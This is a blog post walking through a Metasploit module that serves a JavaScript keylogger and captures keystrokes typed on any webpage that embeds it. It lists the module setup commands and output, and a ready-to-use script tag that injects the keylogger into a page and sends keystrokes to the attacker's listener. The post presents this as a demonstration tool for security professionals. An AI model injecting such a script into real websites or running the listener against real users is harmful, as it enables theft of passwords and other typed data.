Keylogging with Metasploit and Javascript


Keylogging with Metasploit and Javascript
Rarely does a week go by without a friend or family member getting their login credentials compromised, then reused for malicious purposes. My wife is always on the lookout on Facebook, warning relatives and friends to change their passwords. Many people don’t understand how their credentials get compromised. Password reuse on several websites is usually the culprit. Password reuse is a problem even if the website encrypts the passwords in their databases. An attacker only needs to insert some evil code, and allow it to do the work for them.

This is one of the many reasons how the Internet is a like a field of mines, where malicious code is around every turn. If an attacker can insert code on a website they don’t need to crack any passwords. Keyloggers can be included on most websites with one line of code. The activity that ensues is pretty awesome from an attacker’s perspective, they can sit back and watch credentials magically appear. It reminds me of the fisherman tales of fishes jumping into their boats.

In the information security field Metasploit is the ultimate, “I can show you better than I can tell you!” software. Security professionals need to be able to demonstrate exploitation techniques to users and management. I have seen Javascript Keyloggers out there in the wild, but couldn’t find a scalable, easy to deploy version.


So I sat down a couple of weeks ago and wrote a Metasploit based Javascript keylogger from scratch. I have to give props to Wei, Tod, and HD for motivation and help with fine tuning the module.  Adding exploitation techniques to Metasploit solves any scalability and deploy-ability issues. James “@egyp7” Lee presented a talk at the last BSides Las Vegas, on why it makes sense to develop these types of tools using Metasploit. The reason is Metasploit has tons of code that you can reuse to build anything, almost like Lego blocks.

The Metasploit Javascript Keylogger sets up a HTTP/HTTPS listener which serves the Javascript keylogger code and captures the keystrokes over the network. I’ve include a demo page within the module for testing purposes. Just enter “set DEMO true” during module setup as you can see below to activate the demo page. To access the demo page, just append “/demo” to the URL provided.

Of course, the keylogger captures all keystrokes including tabs, carraige returns, and backspaces entered on the webpage once the Javascript HTML tag is in embeded on a webpage.

Step 1: Module setup:

  1. msf > use auxiliary/server/capture/http_javascript_keylogger
  2. msf  auxiliary(http_javascript_keylogger) > set demo true
  3. demo => true
  4. msf  auxiliary(http_javascript_keylogger) > show options
  5. Module options (auxiliary/server/capture/http_javascript_keylogger):
  6.    Name        Current Setting  Required  Description
  7.    —-        —————  ——–  ———–
  8.    DEMO        true             yes       Creates HTML for demo purposes
  9.    SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  10.    SRVPORT     8080             yes       The local port to listen on.
  11.    SSL         false            no        Negotiate SSL for incoming connections
  12.    SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  13.    SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  14.    URIPATH                      no        The URI to use for this exploit (default is random)
  15. msf  auxiliary(http_javascript_keylogger) > run
  16. [*] Using URL: http://0.0.0.0:8080/qZBRzd
  17. [*]  Local IP: http://192.168.1.131:8080/qZBRzd
  18. [*] Server started.

Step 2: Demo page URL
Screen Shot 2012-02-21 at 9.50.02 AM.png
Step 3 (Optional) : To embed the keylogger into any webpage, use a reachable URL along with HTML <script> tag appended with “/[whatever].js”.

  1. <script type=”text/javascript” src=”http://192.168.1.131:8080/qZBRzd/test.js”>

Screen Capture 1: Module setup and run
Screen Shot 2012-02-21 at 9.46.21 AM.png
Screen Capture 2: Demo page
Screen Shot 2012-02-21 at 10.00.24 AM.png
Screen Capture 3: Keystrokes captured and stored to loot
Screen Shot 2012-02-21 at 10.00.07 AM.png
As always hack responsibly. Let me know if you have any question in the comments.
SHARE

About Lasha Gogua

    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment